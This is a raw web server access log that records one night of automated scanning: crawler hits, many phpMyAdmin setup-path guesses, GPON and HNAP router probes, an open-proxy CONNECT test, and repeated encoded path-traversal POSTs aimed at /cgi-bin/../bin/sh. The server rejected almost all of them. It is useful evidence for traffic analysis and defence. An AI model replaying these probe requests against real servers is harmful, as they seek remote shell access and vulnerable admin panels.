162.142.125.210 - - [01/Mar/2022:00:00:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.210 - - [01/Mar/2022:00:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.210 - - [01/Mar/2022:00:00:32 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
45.146.165.37 - - [01/Mar/2022:00:07:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:16:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:16:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.134.134 - - [01/Mar/2022:00:21:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.134.134 - - [01/Mar/2022:00:21:38 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.31.98.171 - - [01/Mar/2022:00:23:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.171 - - [01/Mar/2022:00:23:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
45.146.165.37 - - [01/Mar/2022:00:27:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:29:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.245.70.127 - - [01/Mar/2022:00:29:14 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Mar/2022:00:29:14 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
167.94.138.119 - - [01/Mar/2022:00:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.119 - - [01/Mar/2022:00:33:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [01/Mar/2022:00:33:24 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
45.146.165.37 - - [01/Mar/2022:00:34:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [01/Mar/2022:00:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.209.162 - - [01/Mar/2022:00:38:32 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:39:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:00:41:04 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.245.36.163 - - [01/Mar/2022:00:46:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
157.245.36.163 - - [01/Mar/2022:00:46:02 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
157.245.36.163 - - [01/Mar/2022:00:46:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
209.141.61.19 - - [01/Mar/2022:00:50:15 +0100] "GET http://212.91.246.80:80phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:15 +0100] "GET http://212.91.246.80:80phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:16 +0100] "GET http://212.91.246.80:80pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:16 +0100] "GET http://212.91.246.80:80myadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:17 +0100] "GET http://212.91.246.80:80MyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:17 +0100] "GET http://212.91.246.80:80PHPMYADMIN/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:18 +0100] "GET http://212.91.246.80:80mysqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:19 +0100] "GET http://212.91.246.80:80SQL/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:19 +0100] "GET http://212.91.246.80:80phpadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:20 +0100] "GET http://212.91.246.80:80phpm/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:20 +0100] "GET http://212.91.246.80:80phpmyadmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:20 +0100] "GET http://212.91.246.80:80phpMyAdmin1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:21 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:21 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:22 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:23 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:23 +0100] "GET http://212.91.246.80:80php-my-admin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:24 +0100] "GET http://212.91.246.80:80admin/pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:24 +0100] "GET http://212.91.246.80:80phpMyAdmin-2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:25 +0100] "GET http://212.91.246.80:80typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:25 +0100] "GET http://212.91.246.80:80web/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:25 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
45.146.165.37 - - [01/Mar/2022:00:50:26 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
209.141.61.19 - - [01/Mar/2022:00:50:26 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:26 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:27 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:27 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:28 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:28 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:29 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:29 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:30 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:30 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:31 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:31 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:31 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:32 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:32 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:33 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:33 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:34 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:34 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:35 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:35 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:36 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:36 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:37 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:37 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:37 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:38 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:38 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:39 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:39 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:40 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:40 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:41 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:41 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:42 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:42 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:43 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:43 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:44 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:44 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:45 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:45 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:46 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:46 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:47 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:47 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:48 +0100] "GET http://212.91.246.80:80phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:48 +0100] "GET http://212.91.246.80:80phpmyadmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:49 +0100] "GET http://212.91.246.80:80phpMyAdmin2/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:49 +0100] "GET http://212.91.246.80:80phpmyadmin2/scripts/setup.phpwww.hand.org.hu HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:50 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:50 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:51 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:51 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:51 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:52 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.0.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:52 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:53 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:53 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:54 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.2.0-english/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:54 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:55 +0100] "GET http://212.91.246.80:80phpMyAdmin-3.4.3.1/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:55 +0100] "GET http://212.91.246.80:80phpMyAdmin3/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:56 +0100] "GET http://212.91.246.80:80phpMyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:56 +0100] "GET http://212.91.246.80:80phpmy/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:57 +0100] "GET http://212.91.246.80:80php/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:57 +0100] "GET http://212.91.246.80:80php/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:58 +0100] "GET http://212.91.246.80:80_pma/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:58 +0100] "GET http://212.91.246.80:80sqladmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:50:59 +0100] "GET http://212.91.246.80:80sql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:51:00 +0100] "GET http://212.91.246.80:80tools/phpMyAdmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:51:00 +0100] "GET http://212.91.246.80:80webapps/phpmyadmin/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:51:00 +0100] "GET http://212.91.246.80:80webdb/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
209.141.61.19 - - [01/Mar/2022:00:51:01 +0100] "GET http://212.91.246.80:80websql/scripts/setup.php HTTP/1.0" 400 329 "-" "-"
45.146.165.37 - - [01/Mar/2022:00:51:18 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.72.78.143 - - [01/Mar/2022:00:54:31 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
45.146.165.37 - - [01/Mar/2022:01:02:32 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.220.4 - - [01/Mar/2022:01:03:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:03:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:04:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:05:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.220.4 - - [01/Mar/2022:01:05:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
140.249.15.221 - - [01/Mar/2022:01:05:39 +0100] "CONNECT ifconfig.me:443 HTTP/1.0" 405 341 "-" "-"
45.146.165.37 - - [01/Mar/2022:01:08:38 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:10:28 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
120.86.254.35 - - [01/Mar/2022:01:11:31 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
45.146.165.37 - - [01/Mar/2022:01:12:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.37.190.89 - - [01/Mar/2022:01:12:27 +0100] "GET /IPis/212.91.246.87 HTTP/1.1" 404 341 "-" "Mozilla/5.0 zgrab/0.x"
89.191.156.20 - - [01/Mar/2022:01:13:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
54.193.205.158 - - [01/Mar/2022:01:16:13 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
23.251.102.74 - - [01/Mar/2022:01:20:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
23.251.102.74 - - [01/Mar/2022:01:20:19 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:21:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.210.20.234 - - [01/Mar/2022:01:25:18 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
149.34.63.60 - - [01/Mar/2022:01:26:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:29:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.86.3.138 - - [01/Mar/2022:01:29:31 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
82.207.180.114 - - [01/Mar/2022:01:34:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "node-fetch"
82.207.180.114 - - [01/Mar/2022:01:34:52 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "node-fetch"
82.207.180.114 - - [01/Mar/2022:01:34:52 +0100] "GET /humans.txt HTTP/1.1" 404 328 "-" "node-fetch"
82.134.23.218 - - [01/Mar/2022:01:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.86.3.138 - - [01/Mar/2022:01:36:26 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:36:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [01/Mar/2022:01:37:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
